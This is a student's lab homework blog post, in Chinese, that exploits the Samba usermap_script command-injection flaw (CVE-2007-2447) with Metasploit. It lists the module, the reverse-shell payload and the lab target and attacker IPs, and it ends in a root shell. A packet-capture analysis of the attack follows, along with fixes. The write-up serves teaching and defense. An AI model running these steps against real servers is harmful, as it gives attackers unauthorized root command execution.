20253914 2025-2026-2 《网络攻防实践》第7周作业

一、实践内容

  1. 使用Metasploit进行Linux远程渗透攻击
    Samba Usermap_script 漏洞
    漏洞编号:CVE-2007-2447
    漏洞成因:Samba 服务配置username map script时,未对客户端传入的用户名做过滤,直接拼接带入 shell 执行,导致命令注入。
    漏洞危害:未授权远程命令执行,攻击者无需账号密码,即可执行系统命令,获取服务器最高权限。
    修复措施:
  • 关闭username map script危险配置;
  • 升级 Samba 至安全版本;
  • 限制 445 端口访问,做好边界防护
  1. 进行攻防对抗实践

二、实践过程

(一) 使用Metasploit进行Linux远程渗透攻击

  1. 终端打开msfconsole
    image
  2. use exploit/multi/samba/usermap_script使用该模块进行攻击,输入show payloads查看漏洞的载荷
    image
  3. set payload cmd/unix/reverse设置双向连接载荷,输入show options显示需要设置的参数
    image
  4. 输入set RHOST 192.168.200.18 设置靶机的地址,输入set LHOST 192.168.200.13设置攻击机地址,
    image
  5. 输入run执行渗透攻击
    输入ifconfig得出靶机IP地址,表示攻击成功,与在linux执行ifconfig操作,输出结果一致
    image
    image

(二)攻防对抗实践

  1. 攻击方执行与任务一相同的操作,通过输入whoami可以看到,已经获取了root权限
    image
  2. 防守方抓包分析
    image
项目 结果 依据
攻击者 IP 192.168.200.13 抓包中主动发起 SMB 连接、畸形 Session Setup 请求的主机
目标 IP 192.168.200.18 响应 SMB 请求、返回STATUS_LOGON_FAILURE的主机
目标端口 TCP/139(NetBIOS SMB) 初始三次握手、协议协商、会话建立均使用 139 端口
反向 Shell 端口 TCP/4444 目标主机主动向攻击者 IP 发起的反向连接端口,Metasploit 默认反向 shell 端口
攻击发起时间 抓包时间戳最早的数据包:00000000(对应会话起始) 抓包中首个 SYN 包为攻击起始点
攻击利用漏洞 Samba usermap_script 命令注入漏洞(CVE-2007-2447) 匹配特征:畸形 SMB Session Setup 请求 + STATUS_LOGON_FAILURE + 目标主动发起 4444 反向连接
Shellcode 特征 Metasploit 生成的 Linux/Windows 反向 Shellcode 目标主机主动发起57604 → 4444的 TCP 连接,是典型的反向 Shell payload 执行后的行为
攻击结果 漏洞触发成功,但登录流程失败,反向 Shell 连接建立 目标返回STATUS_LOGON_FAILURE,但反向 TCP 三次握手完成

追踪tcp流发现攻击方执行了whoami操作
image

三、实践总结

认识了 CVE-2007-2447 等历史高危漏洞的利用逻辑,理解恶意 Shellcode、反向 Shell 的作用,清楚攻击者通过命令注入、反弹端口实现远程控制的原理,知晓畸形报文、异常主动外联是入侵核心特征。

posted @ 2026-04-27 08:51  你泽哥  阅读(42)  评论(0)    收藏  举报